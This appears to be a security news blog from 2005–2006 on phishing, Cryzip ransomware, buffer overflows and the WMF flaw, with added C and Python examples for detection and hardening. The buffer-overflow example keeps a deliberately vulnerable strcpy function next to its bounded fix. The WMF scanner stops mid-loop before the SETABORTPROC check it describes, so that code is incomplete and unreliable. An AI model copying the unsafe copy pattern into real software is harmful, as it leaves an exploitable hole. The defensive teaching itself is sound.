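The check deliberately ignores entries that point a brand at 127.0.0.1: those deny access rather than redirect it, and some ad-blocking setups do this on purpose. A Trojan can also redirect by changing the configured DNS servers or by patching the resolver, which this file-level check will not see; the hosts file is simply the first and cheapest place to look.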
There is also little sign that website hosting companies are getting any better at shutting down phishing sites once they are discovered. The average time such a site stayed up was 5.5 days, unchanged from October.
Web monitoring firm Netcraft has warned that a web server belonging to a state-operated Chinese bank is hosting phishing sites targeting US banks and financial institutions.
"This is the first instance we've seen of one bank's infrastructure being used to attack another institution," said Netcraft.
The company revealed that the phishing emails sent over the weekend targeted customers of Chase Bank in the US and eBay, and were directed to sites hosted on IP addresses assigned to the Shanghai branch of the China Construction Bank.
"The phishing pages are located in hidden directories with the server's main page displaying a configuration error," said Netcraft.
Recipients of the emails were offered the chance to earn $20 by filling out a user survey which presented a series of questions.
This was followed by a request for user ID and password so that the $20 'reward' could be deposited into the proper account.
The form also requested the victim's bankcard number, PIN, card verification number, mother's maiden name and Social Security number. Any data submitted was then sent to a free form processing service on a server in India.
One giveaway was that the URL in the phishing email used an IP address rather than a domain, typically a strong indicator of a phishing site.
Netcraft warned that the same IP address at the China Construction Bank in Shanghai was used over the weekend to host a page spoofing the eBay log-in screen.
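The giveaway mentioned above, a raw IP address where a bank's domain should be, is easy to check mechanically, as is the related sign of a brand name appearing in a URL that does not belong to that brand. The following is an added example, not Netcraft's code, of both checks; the brand list, function names and sample URLs are constructed. The handling of the "user@host" trick goes beyond what the article describes: everything before an '@' in the authority part is ignored by the browser, and phishers use that to put a bank's name in front of the real host.

```c
/* Added example (not Netcraft's code): two cheap phishing-URL indicators. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

enum { PH_IP_HOST = 1, PH_BRAND_OFF_DOMAIN = 2 };

/* Brand names whose appearance in a URL is only legitimate on their own
 * domain (constructed list for illustration). */
static const char *const brands[] = { "chase", "ebay", "paypal", NULL };

/* Copies the host of URL into HOST, lower-cased. Handles the "user@host"
 * trick, where everything before '@' is decoration and the real host follows.
 * Returns 0, or -1 when no host can be found or it does not fit. */
static int url_host(const char *url, char *host, size_t n) {
    const char *p = strstr(url, "://");
    p = p ? p + 3 : url;
    const char *stop = strpbrk(p, "/?#");
    const char *at = strchr(p, '@');
    if (at != NULL && (stop == NULL || at < stop)) p = at + 1;
    size_t len = strcspn(p, ":/?#");
    if (len == 0 || len >= n) return -1;
    for (size_t i = 0; i < len; i++) host[i] = (char)tolower((unsigned char)p[i]);
    host[len] = '\0';
    return 0;
}

/* A dotted-quad literal: exactly four groups of one to three digits. */
static int is_ipv4_literal(const char *host) {
    int groups = 0, digits = 0;
    for (const char *c = host; ; c++) {
        if (isdigit((unsigned char)*c)) {
            if (++digits > 3) return 0;
        } else if (*c == '.' || *c == '\0') {
            if (digits == 0) return 0;
            groups++;
            digits = 0;
            if (*c == '\0') break;
        } else {
            return 0;
        }
    }
    return groups == 4;
}

/* True when the label just before the top-level label is BRAND, i.e. the host
 * is brand.<tld> or something.brand.<tld>. Two-part suffixes such as co.uk are
 * not handled; a real deployment would consult the public suffix list. */
static int host_belongs_to(const char *host, const char *brand) {
    const char *tld = strrchr(host, '.');
    if (tld == NULL) return 0;
    const char *label = tld;
    while (label > host && label[-1] != '.') label--;
    return (size_t)(tld - label) == strlen(brand) &&
           strncmp(label, brand, strlen(brand)) == 0;
}

/* Returns a bitmask of PH_* indicators for URL; 0 means nothing noticed. */
int phish_indicators(const char *url) {
    char host[256], lower[1024];
    int flags = 0;
    size_t i;
    if (url_host(url, host, sizeof host) != 0) return 0;
    if (is_ipv4_literal(host)) flags |= PH_IP_HOST;
    for (i = 0; url[i] != '\0' && i < sizeof lower - 1; i++)
        lower[i] = (char)tolower((unsigned char)url[i]);
    lower[i] = '\0';
    for (int b = 0; brands[b] != NULL; b++)
        if (strstr(lower, brands[b]) != NULL && !host_belongs_to(host, brands[b]))
            flags |= PH_BRAND_OFF_DOMAIN;
    return flags;
}

int main(void) {
    /* constructed URLs in the style of the campaign described above */
    const char *samples[] = {
        "http://203.0.113.7/.survey/chase/index.htm",
        "https://www.chase.com/online/survey",
        "http://signin.ebay.com.example.net/ws/eBayISAPI.dll",
    };
    for (size_t k = 0; k < sizeof samples / sizeof samples[0]; k++)
        printf("%d  %s\n", phish_indicators(samples[k]), samples[k]);
    return 0;
}
```

Neither indicator proves anything on its own; plenty of internal tools live on bare IP addresses, and brand names show up in legitimate partner URLs. They are useful as a first-pass score in a mail gateway or a user-awareness tool, where a hit prompts a closer look rather than an automatic block.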

Tuesday, March 14, 2006

Virus hunters have discovered a new Trojan that encrypts files on an infected computer and then demands $300 in ransom for a decryption password.
The Trojan, identified as Cryzip, uses a commercial zip library to store the victim's documents inside a password-protected zip file and leaves step-by-step instructions on how to pay the ransom to retrieve the files.
It is not yet clear how the Trojan is being distributed, but security researchers say it was part of a small e-mail spam run that successfully evaded anti-virus scanners by staying below the radar.
While this type of attack, known as "ransomware," is not entirely new, it points to an increasing level of sophistication among online thieves who use social engineering tactics to trick victims into installing malware, said Shane Coursen, senior technical consultant at Moscow-based anti-virus vendor Kaspersky Lab.
The LURHQ Threat Intelligence Group, based in Chicago, was able to crack the encryption code used in the Cryzip Trojan and determine how the files are encrypted and the payment mechanism that has been set up to collect the $300 ransom.
According to a LURHQ advisory, Cryzip searches an infected hard drive for a wide range of widely used file types, including Word, Excel, PDF and JPG images. Once found, the files are zipped and their original contents overwritten with the text: "Erased by Zippo! GO OUT!!!" (overwriting before deletion defeats simple undelete recovery).
The Trojan then deletes the originals, leaving only the password-protected archive, named after the original file with "_CRYPT.ZIP" appended.
A new file named "AUTO_ZIP_REPORT.TXT" is created with specific instructions on how to use the E-Gold online currency and payment system to send ransom payments.
The instructions, which are marked by misspellings and poor grammar, contain the following text: "Your computer catched our software while browsing illigal porn pages, all your documents, text files, databases was archived with long enought password. You can not guess the password for your archived files - password lenght is more then 10 symbols that makes all password recovery programs fail to bruteforce it (guess password by trying all possible combinations)."
The owner of the infected machine is warned not to search for the program that encrypted the data, claiming that it simply doesn't exist on the hard drive. "If you really care about documents and information in encrypted files you can pay using electonic currency $300," the note says. "Reporting to police about a case will not help you, they do not know password. Reporting somewhere about our E-Gold account will not help you to restore files. This is your only way to get yours files back."
The Trojan author uses scores of E-Gold accounts simultaneously to get around potential shutdowns, according to LURHQ, which published the complete list of E-Gold accounts in the advisory.
Officials from E-Gold, which operates out of the Caribbean island of Nevis, were not available for comment.
"Infection reports are not widespread, so it is not believed this is a mass threat by any means," LURHQ said. However, the company said social engineering malware is typically more successful when it is delivered in low volume to get around anti-virus detections. "[M]ore attention means the likely closing of the accounts used for the anonymous money transfer," LURHQ said.

Sunday, March 12, 2006
One of the most commonly exploited vulnerabilities is the buffer overflow. A buffer overflow occurs when a program writes more data into a fixed-size memory buffer than the buffer can hold, so that the excess spills into adjacent memory; at best the program crashes, and at worst the attacker's input overwrites control data and takes over execution.
There are many tools that let hackers exploit this vulnerability, and knowing them will help you learn how to prevent their successful use on your systems.
One such tool is Digital Monkey's Buffer Syringe, a relatively simple, minimally documented tool that lets hackers exploit buffer overflows. In fact, Buffer Syringe includes several usage examples that make implementation of the tool a snap.
Understanding how Buffer Syringe and tools like it work should give IT managers much more confidence when evaluating, for example, a Windows vulnerability assessment tool or patch management system because it will reveal the ins and outs of how the buffer overflow is constructed.
With this information, IT managers can then exact much more specific and telling information from vendors of commercial vulnerability assessment tools as to how their tools detect such weaknesses. Thus armed, it will be much easier to evaluate, select, implement and use such tools over time.
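To see what such a tool is actually constructing, it helps to look at the bug from the code side. The following is an added example, not Digital Monkey's tool and not any real product's code: a fixed-size buffer that sits next to a privilege flag, the unbounded copy that lets input run over the flag, and the bounded copy that refuses input it cannot hold. The struct, field names and sample input are assumptions for illustration.

```c
/* Added example (not a real vulnerability): an unbounded copy beside its
 * bounded replacement, with a privilege flag placed where the spill lands. */
#include <stdio.h>
#include <string.h>

struct session {
    char user[8];      /* fixed 8-byte buffer: 7 characters plus NUL */
    int  is_admin;     /* sits right after the buffer in memory */
};

/* Vulnerable: strcpy has no idea how big s->user is. A name longer than
 * 7 bytes runs past the buffer into is_admin (and beyond it, into whatever
 * follows). This is undefined behaviour in C; on a typical build it simply
 * overwrites the neighbouring field, which is exactly what an attacker wants.
 * Shown for contrast only; never call it with untrusted input. */
void set_user_unsafe(struct session *s, const char *name) {
    strcpy(s->user, name);
}

/* Hardened: measure the input against the buffer before copying and reject
 * anything that does not fit. Returns 0 on success, -1 on rejection.
 * (Truncating silently with strncpy would also avoid the overflow, but it
 * would turn "administrator" into "adminis", which has problems of its own.) */
int set_user_safe(struct session *s, const char *name) {
    size_t len = strlen(name);
    if (len >= sizeof s->user) return -1;   /* no room for the terminating NUL */
    memcpy(s->user, name, len + 1);
    return 0;
}

int main(void) {
    struct session s = { "guest", 0 };
    const char *attacker_input = "AAAAAAAAAAAAAAAA";   /* constructed: 16 bytes */

    if (set_user_safe(&s, attacker_input) != 0)
        printf("rejected: %zu bytes will not fit in %zu; is_admin still %d\n",
               strlen(attacker_input), sizeof s.user, s.is_admin);

    set_user_safe(&s, "alice");
    printf("user=%s is_admin=%d\n", s.user, s.is_admin);
    return 0;
}
```

The exploit tools the text describes automate the uninteresting part: working out how many bytes of padding reach the field (or, in the usual case, the saved return address on the stack) and what to put there. When evaluating a vulnerability scanner, the question to ask the vendor is therefore whether it detects the unbounded copy itself, or only the known payloads that ride on top of it.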
Early in the methodical stalking of an IT resource, hackers will enumerate and identify systems in a network, looking for something of interest. After identifying an interesting target, smart hackers will gently test to see if any part of a system was left in a default configuration. Such a configuration provides easy back-door entry into what might look from the front like an impregnable fortress.
For Windows systems, start with sysinternals.com, where you'll find a host of useful no-cost and commercial diagnostic tools. -http://sysinternals.com/
Go to nessus.org to become familiar with one of the most widely used vulnerability assessment tools available. Nessus can probe a wide range of server and desktop operating systems and is frequently updated. - http://nessus.org/

Monday, February 20, 2006
A rare piece of malicious software targeting Apple's Mac OS X operating system - instead of the more common victim, Microsoft Windows - has been spotted online and appears to be spreading. Like many computer viruses, the bug lures people to click on it by posing as something else, in this case a file containing a picture of the next-generation Apple operating system.
The malicious software causes computer programs to crash and transmits itself through an instant message program for the Mac called iChat. To get infected, users must download the file, called "latestpics.tgz," and install it on their computer. Infected computers will then automatically attempt to send the program to all contacts on the infected user's "buddy list."
Mac users typically have not had to worry about the computer worms and viruses that regularly hit the Windows-using world. It's a regular debate among techies whether this is because the Mac operating system is inherently more secure or whether computer hackers simply do not bother attacking an operating system that is not widespread. Apple Computer Inc. has less than 5 percent of the U.S. computer market.
Apple released a statement yesterday warning users to download files from only companies they have confidence in. "Apple always advises Macintosh users to only accept files from vendors and Web sites that they know and trust," read the statement. Apple's Web site yesterday afternoon did not appear to give Mac users any notice of the bug, and a spokesman was uncertain whether the company would update its operating system in response to this specific threat.
Hackers have released software that could be used to take over Windows PCs that lack the latest Microsoft security patches. But while this code is dangerous, security experts said today that it had yet to be used by attackers in any widespread way.
The attack code exploits two separate bugs in Windows Media Player, which were addressed in Microsoft's MS06-005 and MS06-006 advisories released Tuesday.
The MS06-005 bug concerns a flaw in the way the Media Player processes bitmap files, while MS06-006 has to do with the Media Player plug in for non-Microsoft browsers.
Of these two bugs, Microsoft rated only MS06-005 as critical, but both could be exploited to seize control of an unpatched machine, according to the French Security Incident Response Team Web site, which has published examples of the malicious code.
In fact, the code that takes advantage of the MS06-006 flaw may be of greater concern to Windows users, said Craig Schmugar, virus research manager with McAfee Inc.'s Avert Labs. "From a vulnerability side, MS06-005 is a concern, but from what we've seen so far, the MS06-006 exploits are further along."
So far, none of the code is being used much by attackers, he said. "Clearly there's been activity on the exploit-code writing side, but we haven't seen that translate into impacting customers."
Another security researcher agreed with Schmugar's assessment. "Yesterday we got a lot of reports of [the code] being used, but they turned out to be false positives," said Johannes Ullrich, chief technology officer of the SANS Internet Storm Center. "I haven't seen anything really used in the wild."
Security intelligence outfit iDefense Labs is offering a $10,000 reward to any hacker who finds a worm hole in Microsoft's products, but the software maker isn't exactly thrilled by the gambit.
One day after iDefense, of Reston, Va., announced the bounty as part of a newly implemented quarterly hacking challenge, Microsoft, based in Redmond, Wash., said it believes paying for flaws is not the best way to secure software products.
Of course Microsoft believes that responsible disclosure, which involves making sure that an update is available from software vendors the same day the vulnerability is first broadly known, is the best way to protect the end user.
The hacking challenge is part of VeriSign-owned iDefense's controversial VCP (Vulnerability Contributor Program), which offers financial incentives to anonymous researchers who agree to give up exclusive rights to advance notification of unpublished vulnerabilities or exploit code.
iDefense Labs defended the new program, insisting that it promotes the concept of responsible disclosure and keeps information on critical zero-day flaws away from malicious attackers.
It is strange that Microsoft offers $250,000 as a bounty to help capture a virus writer, but frowns on paying for the information that would stop the propagation of the virus.
Should all vendors be paying for vulnerabilities? In a free enterprise, everything has a cost and a value. We have recognized that value and we're willing to pay for it. Shouldn't vendors be doing the same thing?
Peter Mell, a computer scientist who manages the NIST (National Institute of Standards and Technology) NVD (National Vulnerability Database), said dangling incentives for hackers to target a single vendor could set a dangerous precedent.

Thursday, February 16, 2006
If the big boys such as Sun Microsystems, Cisco Systems and Microsoft have their way, enterprises soon will have little use for the wares that most of the security vendors here are hawking.
It's rare that those three vendors would all agree on anything, but in speeches and interviews this week, executives from all of them have said that it's time to build security into hardware and software from the ground up and stop trying to fix problems after the fact.
Of course, each vendor has a different idea about how to accomplish that goal, but the underlying idea is the same: Make security an integral part of the network, and not an add-on.
To Cisco, this means enterprises buying into the company's Self-Defending Network strategy. In his keynote speech at the conference, Cisco CEO John Chambers showed off the company's new Security Management Suite, which is designed to automate protection features and management among routers, switches and client devices.
The Cisco Security Manager piece of the suite will enable administrators to create flexible policies that can be shared among devices and then modified on the fly to defend against new threats.
"Automating that process is a fairly scary thing for a lot of people. Integration is classically the hardest and most expensive thing going. Will we get to automation? Yes, but this is more of an interim step to help solve the problem."
Sun executives have their own ideas about where security should lie. They believe security should be provided not by firewalls, IDS boxes or anti-virus scanners, but by the network infrastructure and the software running on it.
The company has started shipping its Trusted Extensions for Solaris, a toolkit that hardens the operating system. The idea is to make security a transparent part of the OS, not a group of add-on features.
Redmond is not standing still either. Many of the features, such as integrated anti-spyware software and upgraded online identity management tools, are things that dozens of security vendors are trying to sell as stand-alone products.
Many observers believe that once those technologies are integrated into Windows, they will quickly become commodities, much like browsers are today. But Gates knows there is still much more work to be done on security, by Microsoft, Sun, Cisco and hundreds of other companies.

Friday, February 10, 2006
Microsoft Corp. announced final licensing and pricing information for its soon-to-be-released Windows OneCare™ Live, the all-in-one, automatic and self-updating PC care service aimed at helping consumers more easily protect and maintain their PCs to keep them running well. Now available free to new beta testers in the United States, at http://ideas.live.com, Microsoft® Windows OneCare Live will be available in June from retailers and via the Web for an annual subscription of $49.95 MSRP for up to three personal computers. To thank its valuable beta customers and offer an easy transition to the paid service, Microsoft also announced today a promotional deal offering the first year of Windows OneCare Live service for $19.95 to beta customers who become subscribers between April 1 and April 30, 2006.
“Consumers have made it clear they need more assistance than what’s offered today, and we are excited to deliver the value of improved protection and maintenance in one comprehensive solution,” said Ryan Hamlin, general manager of the Technology Care and Safety Group at Microsoft. “Windows OneCare Live eases the frustration of protecting your PC and gives consumers greater peace of mind so they can spend less time worrying and more time doing the things they enjoy.”
Windows OneCare Live helps make it simpler and easier for consumers to enhance the overall health of their personal computers by offering automated protection, maintenance, performance tuning and support in an all-in-one package. Hundreds of thousands of people have tested Windows OneCare Live since the beta was launched in November 2005, and Microsoft has continually added features — such as backup for external hard drives — based on their feedback. People have particularly liked the simplicity of the all-in-one nature of the service and, according to recent surveys conducted by Microsoft with Windows OneCare Live beta testers, the vast majority of testers said they would recommend it to a friend or relative.

Saturday, February 04, 2006
As the world waited for one computer virus to strike on Friday, another wriggled its way into the Russian stock exchange and knocked it offline.
Computer experts had warned that 3 February could bring gloom for many as a computer virus called Nyxem was scheduled to start deleting files on machines it had infected.
Nyxem is programmed to randomly delete Word, Excel and PowerPoint documents as well as pdf files, zip files and several other file types. The virus was released several weeks ago and has spread by forwarding itself to email addresses found on the computers it infects.
But widespread damage failed to materialise and by early evening UK time on Friday several anti-virus companies said they had received no reports of incidents involving Nyxem. Patches against the virus had been released on 16 January.
But a collective sigh of relief was tempered by news that the Russian stock exchange has been subjected to an attack instigated by an unnamed, and apparently unrelated, computer pest.
Specific hack
Dmitry Shatsky, vice president of the Russian Trading System (RTS), said in a statement that a virus had infected a single computer used to test trading software that was connected to the internet. The entire network had to be temporarily shut down on Thursday as experts sought to isolate the infected machine and scanned other PCs for signs of infection.
Russian anti-virus company Kaspersky said sources had revealed that the infected machine was controlled remotely to launch a denial-of-service (DoS) attack against other systems on the trading network.
This involves bombarding a system with huge amounts of irrelevant information in an attempt to bring it down.
"While all the world was in a frenzy over the damp squib that was Nyxem, this attack infiltrated the RTS and could have potentially given hackers access to their systems," adds Graham Cluley, senior technology consultant for computer-security firm Sophos. "A virus which can disrupt a stock exchange can have obvious financial consequences, as well as harm the important credibility of an institution in the public's eye."

Thursday, February 02, 2006
The Mozilla Foundation has shipped the first patch for its flagship Firefox 1.5 browser to plug a series of security vulnerabilities and memory leaks.
The open-source group has started pushing out Firefox 1.5.0.1 as an automatic update and recommended that all users apply the upgrade to protect against a known denial-of-service bug and several undisclosed security issues.
"We recommend that all users upgrade to this latest version," Mozilla said in a note posted online. In addition to security patches and fixes for memory leak issues, Firefox 1.5.0.1 also promises improved stability and improved support for Mac OS X.
The Foundation did not release details on most of the security flaws being fixed. The published list of patched Firefox vulnerabilities has not been updated to reflect the new browser release.
The denial-of-service exploit was confirmed on Firefox 1.5 on Windows XP SP2 (Service Pack 2) and is caused by an error in the way the open-source browser handles large history information. An attacker can fill the browser's "history.dat" file with large history information by tricking a user into visiting a malicious Web site with an overly large title.

Tuesday, January 31, 2006

Win32/Mywife.E@mm is a mass-mailing network worm that targets certain versions of Microsoft Windows. The worm spreads through e-mail attachments and writeable network shares. It is expected to corrupt the content of specific files on the third day of every month. This threat has been assigned CME identifier CME-24. It will be detected as Win32/Mywife.E@mm!CME-24.
Platform: Windows 2000, Windows XP, Windows Server 2003, Windows ME, Windows 98
CME-24 Microsoft Security Advisory (904420)
Users of Advanced Micro Devices Inc.'s microprocessors may want to think twice before looking for technical support on the company's Web site. Customer support discussion forums on the forums.amd.com site have been compromised and are being used in an attempt to infect visitors with malicious software, an AMD spokesman confirmed Monday.
The problem was first reported Monday in a blog posting by Mikko Hypponen, manager of antivirus research at F-Secure Corp. in Helsinki. As of Monday morning, AMD technicians were still working to resolve the problem, according to AMD spokesman Drew Prairie.
Because AMD had just learned of the problem, Prairie could give few details on how the site was compromised or when AMD expected to have the issue resolved.
According to F-Secure's Hypponen, attackers are exploiting a widely reported flaw in the way the Windows operating system renders images that use the WMF (Windows Metafile) graphics format. This flaw was patched on Jan. 5, so users who are running versions of Windows that have the latest patches installed are not at risk.
Because of the nature of the WMF vulnerability, however, hackers could install any type of software they wanted on unpatched systems.
How the attackers were able to compromise the AMD forums is unclear. Hypponen said that the AMD server could have been hacked, but that the problem could also be due to an intrusion at an AMD partner Web site or at an ISP.
These kinds of WMF exploits have already been seen on a number of Web sites, but AMD is the most high-profile victim. Because users tend to trust content served by known Web sites like AMD's, the hack is particularly troublesome.

Sunday, January 22, 2006


Today a most interesting exploit came to my attention: an unknown service, DFind.exe, in Task Manager. I admit it hid pretty well from me for a while, at any rate. Hiding this inside the hidden folder "System Volume Information" was an interesting little twist. After killing the service and deleting it, it was pretty easy to remove, however.

Saturday, January 21, 2006
A new version of the popular Skype VOIP application has been released to correct a bug that caused Skype to be misread as a potential security threat.
The Skype 2.0.0.73 for Windows update fixes a flaw that triggered a DEP (Data Execution Protection) warning on systems running Windows XP SP2 with DEP-enabled Intel or AMD processors.
DEP is a set of hardware and software technologies that perform additional checks on memory to help prevent buffer overflow attacks.
The Skype bug meant that users running new computers had to manually configure the application as an exception to turn off the DEP warnings.
This, however, created a scenario where users were being lulled into ignoring DEP warnings because of the Skype bug.
"If you added Skype to some DEP exception list before this release, feel free to upgrade to 2.0.0.73 and then remove it from the exceptions list," the company said.

Wednesday, January 18, 2006
Oracle Corp. released patches addressing more than 100 separate vulnerabilities in its database and application server software, as well as in its collaboration and e-business suites.
The patches, which are part of Oracle’s scheduled quarterly updates, included fixes for flaws in its PeopleSoft and J.D. Edwards portfolios.
A large number of the flaws affecting Oracle’s databases were listed as having a “wide” impact on database availability, integrity and confidentiality.
For instance, one of them is a vulnerability in Oracle databases that enables any user with basic access privileges to assume the role of a database administrator. The flaw, first reported to Oracle in October by database security firm Imperva Inc., also allows would-be attackers to prevent illegal activity from being recorded by the database server's built-in auditing mechanism, said Shlomo Kramer, Imperva's CEO.
This is the second batch of patches to be released by Oracle since the company moved to a quarterly schedule last fall. Oracle’s next patch update is slated for April 12.
Under its Critical Patch Update program, Oracle has said that it will release highly integrated patches that combine fixes for multiple high-priority vulnerabilities. The patches are cumulative, meaning users who miss applying patches one quarter can apply a cumulative update the following quarter that addresses both the previous problems and any new ones that might have cropped up.
Oracle has made a great deal of improvement over the past year in [its] security response processes, but there is still a long way to go.

Updated: America Online posts a hotfix to correct a buffer overflow vulnerability in its "You've Got Pictures" photo album service.
A critical security flaw in America Online Inc.'s "You've Got Pictures" service could put millions of users at risk of PC takeover attacks, according to a warning from the US-CERT (U.S. Computer Emergency Readiness Team).
In an advisory, US-CERT described the flaw as a buffer overflow in an AOL YPG Picture Finder Tool ActiveX control (YGPPicFinder.DLL) that may be exploited to execute arbitrary code or cause a denial-of-service condition.
The vulnerability affects AOL 8.0, AOL 8.0 Plus and AOL 9.0 Classic. In addition, the vulnerable control was distributed via the "You've Got Pictures" Web site prior to 2004.
A separate alert from FrSIRT (French Security Incident Response Team) rated the bug as "critical" and warned that the vulnerable ActiveX control does not properly handle overly long input strings.
"[This] could be exploited by remote attackers to compromise a vulnerable system by convincing a user to visit a specially crafted Web page."

Sunday, January 15, 2006
ESET, a personal favorite provider of security software for enterprises and consumers, announced that its NOD32 solution with ThreatSense(R) technology has been enhanced to protect users and organizations against stealth rootkit applications. Rootkits, which by design are highly undetectable, are widely known to escape discovery by traditional signature-based antivirus methods.
Rootkits recently came to public attention when it was discovered that Sony included a rootkit on some of its music CDs and video DVDs in an effort to prevent illegal copying and distribution of copyrighted material. Designed specifically to be "invisible" to users, rootkits can be used to hide malicious software, giving criminals the opportunity to exploit unprotected computers.
"Rootkit detection is based on the new generation of intelligent signatures, which is a part of the ThreatSense technology," says Richard Marko, chief software engineer for ESET. "Currently, ESET is the only integrated threat protection system known to proactively detect even unknown rootkits."
ESET's NOD32 ThreatSense(R) technology is a sophisticated detection system based on advanced heuristics that proactively identifies previously unknown malware, such as that which exploited the Sony rootkit.
Rootkit protection is available immediately to current NOD32 license holders, and will be automatically installed to computers configured to receive automatic program component updates. To download a free trial copy of NOD32, please visit www.eset.com.

Wednesday, January 11, 2006
Responding to the rising cybercrime threat, the Federal Trade Commission on Tuesday unveiled an online tool designed to help consumers avoid becoming victims of Internet scams.
At the website, www.onguardonline.gov, consumers can take interactive quizzes designed to enlighten them about ID theft, phishing, spam and online-shopping scams.
If the user selects a wrong answer, the program explains why that particular misconception about Internet security can lead to trouble.
Elsewhere on the site, consumers can find detailed guidance on how to monitor their credit histories, use effective passwords and recover from identity theft.
"We're trying to make the information as accessible as possible, with tips so people can take action," said Nat Wood, the FTC's assistant director for consumer and business education.
The education push comes as the tide of cybercrime continues to rise. Special reports by USA TODAY have detailed how online thieves are sidestepping computer firewalls, anti-virus and anti-spyware programs to conduct elaborate scams centered around use of the Internet.
Inherently difficult to track, evidence of cybercrime nonetheless continues to mount:
•Malicious software. During the first half of 2005, 74% of the top 50 malicious attacks contained code to steal account logons, passwords and other sensitive data, compared with 54% the previous six months, according to security firm Symantec.
•Keystroke loggers. The number of programs designed to directly swipe logons and passwords, as a computer user types them on a keyboard, soared to about 6,191 last year, up from 3,753 in 2004, says iDefense, a division of VeriSign.
•Hijacked online accounts. Computers in an estimated 9.9 million U.S. households that engage in online banking transactions have been infected by keystroke loggers, giving cybercrooks potential access to an estimated $24 billion in deposits, says the tech security think tank the SANS Institute.

1.11.2006 Microsoft Corp. released two patches Tuesday that carry its maximum rating of critical, to fix software problems that could allow an attacker to take control of another person's computer.
Microsoft said one patch is to fix a flaw in Windows desktop and server software that could let an attacker gain control of an Internet-connected computer if a user were tricked into visiting a malicious Web site. The fix is for operating systems dating back to Windows 2000.
The other patch is to fix a flaw in the part of Microsoft's Office business software and Exchange Server software that lets users change and manage language preferences. The fix is for versions of the software dating back to Office 2000.
The patches, released Tuesday as part of Microsoft's regular monthly security update, follow the release last week of another critical fix for a flaw in an element of Windows that is used to view images.

Wednesday, January 04, 2006

Microsoft Corp. has slapped a 'buyer beware' tag on a third-party patch for the zero-day Windows Metafile flaw and promised that its own properly tested update will almost certainly ship Jan. 10.
The company's latest guidance comes days after an unofficial hotfix from reverse-engineering guru Ilfak Guilfanov got rare blessings from experts at the SANS ISC (Internet Storm Center) and anti-virus vendor F-Secure Corp.
Guilfanov, author of the IDA (Interactive Disassembler Pro), released an executable that revokes the "SETABORT" escape sequence that is the crux of the problem. The hotfix was tested and approved for use by many security experts, but Microsoft says it cannot vouch for the quality of the fix.
"Microsoft recommends that customers download and deploy the security update for the WMF vulnerability that we are targeting for release on January 10, 2006," the company said in an updated advisory.
Microsoft said its own patch has already been developed and is going through a rigid round of quality assurance testing. "The security update is now being localized and tested to ensure quality and application compatibility." Last-minute glitches in the patch testing process could still delay the update.
As a general rule, the Redmond, Wash., company never recommends third-party updates. Ever since attackers started exploiting the bug to push malware on vulnerable Windows systems (XP SP2 included), the company has thrown all its security resources into the investigation and patch-creation process, making it virtually impossible to validate the third-party code.

Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution.
Published: December 28, 2005 | Updated: January 3, 2006
On Tuesday, December 27, 2005, Microsoft became aware of public reports of malicious attacks on some customers involving a previously unknown security vulnerability in the Windows Meta File (WMF) code area in the Windows platform.
Upon learning of the attacks, Microsoft mobilized under its Software Security Incident Response Process (SSIRP) to analyze the attack, assess its scope, define an engineering plan, and determine the appropriate guidance for customers, as well as to engage with anti-virus partners and law enforcement.
Microsoft confirmed the technical details of the attack on December 28, 2005 and immediately began developing a security update for the WMF vulnerability on an expedited track.
Microsoft has completed development of the security update for the vulnerability. The security update is now being localized and tested to ensure quality and application compatibility. Microsoft’s goal is to release the update on Tuesday, January 10, 2006, as part of its monthly release of security bulletins. This release is predicated on successful completion of quality testing.
The update will be released worldwide simultaneously in 23 languages for all affected versions of Windows once it passes a series of rigorous testing procedures. It will be available on Microsoft’s Download Center, as well as through Microsoft Update and Windows Update. Customers who use Windows’ Automatic Updates feature will be delivered the fix automatically.
Based on strong customer feedback, all Microsoft’s security updates must pass a series of quality tests, including testing by third parties, to assure customers that they can be deployed effectively in all languages and for all versions of the Windows platform with minimum down time.
Microsoft has been carefully monitoring the attempted exploitation of the WMF vulnerability since it became public last week, through its own forensic capabilities and through partnerships within the industry and law enforcement. Although the issue is serious and malicious attacks are being attempted, Microsoft’s intelligence sources indicate that the attacks are limited in scope and are not widespread.
In addition, anti-virus companies indicate that attacks based on exploiting the WMF vulnerability are being effectively mitigated through up-to-date signatures.
Customers are encouraged to keep their anti-virus software up-to-date. The Microsoft Windows AntiSpyware (Beta) can also help protect your system from spyware and other potentially unwanted software. Customers can also visit Windows Live Safety Center and are encouraged to use the Complete Scan option to check for and remove malicious software that takes advantage of this vulnerability. We will continue to investigate these public reports.
If you are a Windows OneCare user and your current status is green, you are already protected from known malware that uses this vulnerability to attempt to attack systems.
Customers who follow safe browsing best practices are not likely to be compromised by any exploitation of the WMF vulnerability. Users should take care not to visit unfamiliar or un-trusted Web sites that could potentially host the malicious code.
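The two items above turn on a single WMF record type: the META_ESCAPE record carrying the SETABORTPROC sub-function. The scanner below is an added example (not Microsoft's or Guilfanov's code) that walks a metafile's record list and reports that escape, plus records whose declared size is malformed; the sample files are constructed inline, and the constants come from the public WMF/wingdi definitions.

```python
import struct

META_ESCAPE = 0x0626        # WMF record function META_ESCAPE (wingdi.h)
META_EOF = 0x0000           # terminating record
SETABORTPROC = 9            # escape sub-function named in the advisory
PLACEABLE_KEY = 0x9AC6CDD7  # magic of the optional 22-byte placeable header


def build_wmf(records):
    """Build a minimal standard WMF from (function, params) pairs.
    Constructed test data only; params are raw little-endian bytes."""
    body = b""
    max_words = 0
    for func, params in records:
        size_words = (6 + len(params)) // 2      # record size is in 16-bit words
        body += struct.pack("<IH", size_words, func) + params
        max_words = max(max_words, size_words)
    total_words = (18 + len(body)) // 2
    # mtType=1 (memory), mtHeaderSize=9 words, mtVersion=0x300, mtSize,
    # mtNoObjects=0, mtMaxRecord, mtNoParameters=0
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, total_words, 0, max_words, 0)
    return header + body


def scan_wmf(data):
    """Walk the record list and return [(offset, reason)] for anything a
    defender should reject: a SETABORTPROC escape, or a record whose declared
    size is smaller than its own 6-byte header or runs past end of file."""
    findings = []
    off = 0
    if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        off = 22                                  # skip the placeable header
    if len(data) < off + 18:
        raise ValueError("file too short for a WMF header")
    mt_type, header_words = struct.unpack_from("<HH", data, off)
    if mt_type not in (1, 2) or header_words != 9:
        raise ValueError("not a standard WMF header")
    off += header_words * 2
    while off + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, off)
        if size_words < 3:
            findings.append((off, "malformed record size"))
            break
        end = off + size_words * 2
        if end > len(data):
            findings.append((off, "record runs past end of file"))
            break
        if func == META_EOF:
            break
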